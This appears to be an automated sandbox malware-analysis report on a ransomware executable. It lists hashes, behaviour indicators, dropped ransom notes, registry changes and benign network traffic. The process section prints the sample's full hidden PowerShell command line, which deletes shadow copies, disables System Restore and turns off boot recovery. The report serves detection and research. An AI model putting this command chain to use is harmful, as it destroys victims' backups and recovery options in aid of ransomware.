File name:

591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe

Full analysis: https://app.any.run/tasks/5661747a-afe0-4ade-952b-2d5c8e3afc3e
Verdict: Malicious activity
Threats:

Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying.

Malware Trends Tracker     >>>
Analysis date: March 05, 2026, 16:15:38
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
ransomware
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 4 sections
MD5:

EB5D62F37C2A7CDD355B483D06FF7278

SHA1:

E21B853BD54E1305F3C0D0EB6F8DA52B70B0D722

SHA256:

591E7F5EB141C22919A406508F63A558E3BD732FE38844CEDBBEA938D666E78B

SSDEEP:

768:sAYQA+EJJ9P+3lGMU3vUDQM+pI3uRB/3qqB87pdMFtb8cmY11f3qrVBUoxygse3C:O+ElPnMwdO3uRB/6A8lCFtb8If6C

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Renames files like ransomware

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3388)

    • Using BCDEDIT.EXE to modify recovery options

      • cmd.exe (PID: 3656)
      • cmd.exe (PID: 8356)

    • Deletes shadow copies

      • vssadmin.exe (PID: 8604)
      • vssadmin.exe (PID: 8460)
      • vssadmin.exe (PID: 6952)

    • Resizes shadow copies

      • cmd.exe (PID: 8372)
      • cmd.exe (PID: 2900)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)
      • cmd.exe (PID: 8892)
      • powershell.exe (PID: 3388)

    • Reads the date of Windows installation

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)

    • Creates file in the systems drive root

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)

    • Executing commands from a ".bat" file

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)

    • System recovery suppression via bcdedit.exe

      • cmd.exe (PID: 8892)
      • cmd.exe (PID: 2248)
      • powershell.exe (PID: 3388)
      • cmd.exe (PID: 3656)

    • Application launched itself

      • cmd.exe (PID: 8892)

    • Escape characters obfuscation (POWERSHELL)

      • cmd.exe (PID: 2248)

    • Executes script without checking the security policy

      • powershell.exe (PID: 3388)

    • Manipulates environment variables

      • powershell.exe (PID: 3388)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 2248)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 2248)

    • Starts application with an unusual extension

      • powershell.exe (PID: 3388)

    • Executes as Windows Service

      • VSSVC.exe (PID: 9136)

  • INFO

    • Reads the machine GUID from the registry

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)

    • Process checks computer location settings

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)

    • Reads security settings of Internet Explorer

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)

    • Checks supported languages

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)
      • chcp.com (PID: 7048)

    • Reads the computer name

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)

    • Create files in a temporary directory

      • 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe (PID: 7660)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 7360)

    • Checks proxy server information

      • mshta.exe (PID: 7360)

    • Changes the display of characters in the console

      • powershell.exe (PID: 3388)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2019:06:05 16:25:41+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14
CodeSize: 20480
InitializedDataSize: 42496
UninitializedDataSize: -
EntryPoint: 0x1b82
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
171
Monitored processes
24
Malicious processes
9
Suspicious processes
4

Behavior graph

Click at the process to see the details
start 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe no specs cmd.exe conhost.exe no specs mshta.exe no specs cmd.exe no specs powershell.exe no specs chcp.com no specs cmd.exe no specs vssadmin.exe no specs vssvc.exe no specs cmd.exe no specs vssadmin.exe no specs SPPSurrogate no specs cmd.exe no specs vssadmin.exe no specs cmd.exe no specs vssadmin.exe no specs cmd.exe no specs bcdedit.exe no specs cmd.exe no specs bcdedit.exe no specs cmd.exe no specs vssadmin.exe no specs slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1176"C:\WINDOWS\system32\cmd.exe" /c "C:\WINDOWS\Sysnative\vssadmin delete shadows /all /quiet"C:\Windows\SysWOW64\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
1908C:\WINDOWS\Sysnative\bcdedit /set {default} bootstatuspolicy ignoreallfailuresC:\Windows\System32\bcdedit.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Boot Configuration Data Editor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\bcdedit.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\cryptsp.dll
2248cmd.exe /q /c "powershell.ExE -nop -w hidden -c $Sys64 = \"$env:SystemRoot\Sysnative\";$Sys32 = \"$env:SystemRoot\System32\";chcp 1251;IF (Test-Path \"$Sys64\vssadmin.exe\"){cmd /c \"$Sys64\vssadmin delete shadows /all /quiet\";cmd /c \"$Sys64\vssadmin delete shadows /all /quiet\"} ELSE {cmd /c \"$Sys32\vssadmin delete shadows /all /quiet\";cmd /c \"$Sys32\vssadmin delete shadows /all /quiet\"};$Disks = [System.IO.DriveInfo]::getdrives() ^| ?{$_.DriveType -eq \"Fixed\" };Disable-ComputerRestore $Disks;$LogicalDisks = (GET-WMIObject -query \"SELECT * from win32_logicaldisk where DriveType = '3'\");If ($LogicalDisks -ne $null) {foreach ($LD in $LogicalDisks) {$Disk = $LD.DeviceID;Foreach ($LogicalDisk in $LogicalDisks) {$PrevVerEnable = \"vssadmin.exe Resize ShadowStorage /For=$Disk /On=$Disk /MaxSize=401MB\";$PrevVerEnableUn = \"vssadmin.exe Resize ShadowStorage /For=$Disk /On=$Disk /MaxSize=unbounded\";IF (Test-Path \"$Sys64\vssadmin.exe\") {cmd /c \"$Sys64\$PrevVerEnable\";cmd /c \"$Sys64\$PrevVerEnableUn\"} ELSE {cmd /c \"$Sys32\$PrevVerEnable\";cmd /c \"$Sys32\$PrevVerEnableUn\"}}}};IF (Test-Path \"$Sys64\vssadmin.exe\") {cmd /c \"$Sys64\bcdedit /set {default} recoveryenabled No\";cmd /c \"$Sys64\bcdedit /set {default} bootstatuspolicy ignoreallfailures\";cmd /c \"$Sys64\vssadmin delete shadows /all /quiet\"} ELSE {cmd /c \"$Sys32\bcdedit /set {default} recoveryenabled No\";cmd /c \"$Sys32\bcdedit /set {default} bootstatuspolicy ignoreallfailures\";cmd /c \"$Sys32\vssadmin delete shadows /all /quiet\"}"C:\Windows\SysWOW64\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
2900"C:\WINDOWS\system32\cmd.exe" /c "C:\WINDOWS\Sysnative\vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=401MB"C:\Windows\SysWOW64\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
3232C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
3380C:\WINDOWS\Sysnative\bcdedit /set {default} recoveryenabled NoC:\Windows\System32\bcdedit.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Boot Configuration Data Editor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\bcdedit.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\cryptsp.dll
3388powershell.ExE -nop -w hidden -c $Sys64 = \"$env:SystemRoot\Sysnative\";$Sys32 = \"$env:SystemRoot\System32\";chcp 1251;IF (Test-Path \"$Sys64\vssadmin.exe\"){cmd /c \"$Sys64\vssadmin delete shadows /all /quiet\";cmd /c \"$Sys64\vssadmin delete shadows /all /quiet\"} ELSE {cmd /c \"$Sys32\vssadmin delete shadows /all /quiet\";cmd /c \"$Sys32\vssadmin delete shadows /all /quiet\"};$Disks = [System.IO.DriveInfo]::getdrives() | ?{$_.DriveType -eq \"Fixed\" };Disable-ComputerRestore $Disks;$LogicalDisks = (GET-WMIObject -query \"SELECT * from win32_logicaldisk where DriveType = '3'\");If ($LogicalDisks -ne $null) {foreach ($LD in $LogicalDisks) {$Disk = $LD.DeviceID;Foreach ($LogicalDisk in $LogicalDisks) {$PrevVerEnable = \"vssadmin.exe Resize ShadowStorage /For=$Disk /On=$Disk /MaxSize=401MB\";$PrevVerEnableUn = \"vssadmin.exe Resize ShadowStorage /For=$Disk /On=$Disk /MaxSize=unbounded\";IF (Test-Path \"$Sys64\vssadmin.exe\") {cmd /c \"$Sys64\$PrevVerEnable\";cmd /c \"$Sys64\$PrevVerEnableUn\"} ELSE {cmd /c \"$Sys32\$PrevVerEnable\";cmd /c \"$Sys32\$PrevVerEnableUn\"}}}};IF (Test-Path \"$Sys64\vssadmin.exe\") {cmd /c \"$Sys64\bcdedit /set {default} recoveryenabled No\";cmd /c \"$Sys64\bcdedit /set {default} bootstatuspolicy ignoreallfailures\";cmd /c \"$Sys64\vssadmin delete shadows /all /quiet\"} ELSE {cmd /c \"$Sys32\bcdedit /set {default} recoveryenabled No\";cmd /c \"$Sys32\bcdedit /set {default} bootstatuspolicy ignoreallfailures\";cmd /c \"$Sys32\vssadmin delete shadows /all /quiet\"}C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
3656"C:\WINDOWS\system32\cmd.exe" /c "C:\WINDOWS\Sysnative\bcdedit /set {default} bootstatuspolicy ignoreallfailures"C:\Windows\SysWOW64\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
3796C:\WINDOWS\Sysnative\vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=401MBC:\Windows\System32\vssadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Command Line Interface for Microsoft® Volume Shadow Copy Service
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\vssadmin.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\combase.dll
6900"C:\WINDOWS\system32\cmd.exe" /c "C:\WINDOWS\Sysnative\vssadmin delete shadows /all /quiet"C:\Windows\SysWOW64\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
Total events
9 553
Read events
9 502
Write events
31
Delete events
20

Modification events

(PID) Process:(7660) 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exeKey:HKEY_CURRENT_USER\SOFTWARE\GNU\Display
Operation:writeName:windowData
Value:
569CB5916C72B89B47B4B0141B7373C103F314B60ABAFEB28D1A769B3290F92FC0DC297BDE8AF119C4E0DF7BB950E880B7B8BFE9DC424E9715739D0C2F740F51E8C9784450C1441465B464A3758CBCEC4FACDB55CDE8B115
(PID) Process:(7660) 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(7660) 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(7660) 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(7660) 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(7660) 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\WINDOWS\System32\cmd.exe.FriendlyAppName
Value:
Windows Command Processor
(PID) Process:(7660) 591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
Operation:writeName:C:\WINDOWS\System32\cmd.exe.ApplicationCompany
Value:
Microsoft Corporation
(PID) Process:(7360) mshta.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\DirectDraw\MostRecentApplication
Operation:writeName:Name
Value:
mshta.exe
(PID) Process:(7360) mshta.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\DirectDraw\MostRecentApplication
Operation:writeName:ID
Value:
(PID) Process:(8636) dllhost.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SPP\Clients
Operation:delete valueName:{09F7EDC5-294E-4180-AF6A-FB0E6A0E9513}
Value:
\\?\Volume{2f5c5e72-85a9-11eb-90a8-9a9b76358421}\:(C%3A)
Executable files
0
Suspicious files
77
Text files
59
Unknown types
0

Dropped files

PID
Process
Filename
Type
7660591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exeC:\Users\admin\YOUR_FILES_ARE_ENCRYPTED.TXTtext
MD5:AD9A93A93A3C387F3F63A97A9D927481
SHA256:3A678365CACDB73695B3DF18C743B340C6AD801F4CAEE7985C06798D3894EDB4
7660591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exeC:\Users\Public\YOUR_FILES_ARE_ENCRYPTED.TXTtext
MD5:AD9A93A93A3C387F3F63A97A9D927481
SHA256:3A678365CACDB73695B3DF18C743B340C6AD801F4CAEE7985C06798D3894EDB4
7660591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exeC:\BOOTNXT.FIXTbinary
MD5:3D72D45C643786A3EE705EB1385FAF9C
SHA256:A061F6BF4349E32E12A22723922C92EF2849F52880F88394D93DD137C5982BE2
7660591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exeC:\BOOTNXTbinary
MD5:3D72D45C643786A3EE705EB1385FAF9C
SHA256:A061F6BF4349E32E12A22723922C92EF2849F52880F88394D93DD137C5982BE2
7660591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exeC:\bootTel.datbinary
MD5:F2E7D6FA86E0EB0442208EDA9488FFB6
SHA256:932FF3B72EF313CF4289162940A125278D1D6D3A1833B5C29A65B0AABFB2206F
7660591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exeC:\Users\admin\.ms-ad\YOUR_FILES_ARE_ENCRYPTED.TXTtext
MD5:AD9A93A93A3C387F3F63A97A9D927481
SHA256:3A678365CACDB73695B3DF18C743B340C6AD801F4CAEE7985C06798D3894EDB4
7660591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exeC:\Users\admin\Contacts\YOUR_FILES_ARE_ENCRYPTED.TXTtext
MD5:AD9A93A93A3C387F3F63A97A9D927481
SHA256:3A678365CACDB73695B3DF18C743B340C6AD801F4CAEE7985C06798D3894EDB4
7660591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exeC:\bootTel.dat.FIXTbinary
MD5:F2E7D6FA86E0EB0442208EDA9488FFB6
SHA256:932FF3B72EF313CF4289162940A125278D1D6D3A1833B5C29A65B0AABFB2206F
7660591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exeC:\Users\admin\3D Objects\YOUR_FILES_ARE_ENCRYPTED.TXTtext
MD5:AD9A93A93A3C387F3F63A97A9D927481
SHA256:3A678365CACDB73695B3DF18C743B340C6AD801F4CAEE7985C06798D3894EDB4
7660591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exeC:\Users\admin\Desktop\YOUR_FILES_ARE_ENCRYPTED.TXTtext
MD5:AD9A93A93A3C387F3F63A97A9D927481
SHA256:3A678365CACDB73695B3DF18C743B340C6AD801F4CAEE7985C06798D3894EDB4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
15
TCP/UDP connections
37
DNS requests
15
Threats
6

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
356
svchost.exe
POST
404
20.190.159.68:443
https://login.live.com/RST2.srf
US
xml
341 b
whitelisted
356
svchost.exe
POST
404
20.190.159.68:443
https://login.live.com/RST2.srf
US
xml
341 b
whitelisted
356
svchost.exe
POST
404
20.190.159.68:443
https://login.live.com/RST2.srf
US
xml
341 b
whitelisted
356
svchost.exe
POST
404
20.190.159.68:443
https://login.live.com/RST2.srf
US
xml
341 b
whitelisted
356
svchost.exe
POST
404
20.190.159.68:443
https://login.live.com/RST2.srf
US
xml
341 b
whitelisted
356
svchost.exe
POST
404
20.190.159.68:443
https://login.live.com/RST2.srf
US
xml
341 b
whitelisted
356
svchost.exe
POST
404
20.190.159.68:443
https://login.live.com/RST2.srf
US
xml
341 b
whitelisted
2232
SIHClient.exe
GET
404
135.233.95.135:443
https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping
US
xml
341 b
whitelisted
2232
SIHClient.exe
GET
404
20.165.94.63:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
US
xml
341 b
whitelisted
2232
SIHClient.exe
GET
404
20.165.94.63:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
US
xml
341 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
Not routed
whitelisted
7428
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
9080
RUXIMICS.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6768
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
184.86.251.24:443
www.bing.com
AKAMAI-ASN1
NL
whitelisted
3412
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
356
svchost.exe
20.190.159.68:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6768
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7428
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 40.127.240.158
whitelisted
www.bing.com
  • 184.86.251.24
  • 184.86.251.27
  • 184.86.251.21
  • 184.86.251.20
  • 184.86.251.13
whitelisted
self.events.data.microsoft.com
  • 52.168.117.175
whitelisted
google.com
  • 142.251.143.110
whitelisted
client.wns.windows.com
  • 172.211.123.248
whitelisted
login.live.com
  • 20.190.159.68
  • 20.190.159.4
  • 20.190.159.0
  • 20.190.159.64
  • 40.126.31.71
  • 40.126.31.2
  • 20.190.159.128
  • 20.190.159.130
whitelisted
slscr.update.microsoft.com
  • 20.165.94.63
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 135.233.95.135
  • 2603:1030:40c:16::565
whitelisted
135.95.233.135.in-addr.arpa
whitelisted
activation-v2.sls.microsoft.com
  • 48.192.1.64
whitelisted

Threats

PID
Process
Class
Message
Generic Protocol Command Decode
SURICATA STREAM suspected RST injection
3412
svchost.exe
Generic Protocol Command Decode
SURICATA HTTP unable to match response to request
3412
svchost.exe
Generic Protocol Command Decode
SURICATA HTTP unable to match response to request
3412
svchost.exe
Generic Protocol Command Decode
SURICATA HTTP unable to match response to request
3412
svchost.exe
Generic Protocol Command Decode
SURICATA HTTP unable to match response to request
3412
svchost.exe
Generic Protocol Command Decode
SURICATA HTTP unable to match response to request
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
591e7f5eb141c22919a406508f63a558e3bd732fe38844cedbbea938d666e78b.exe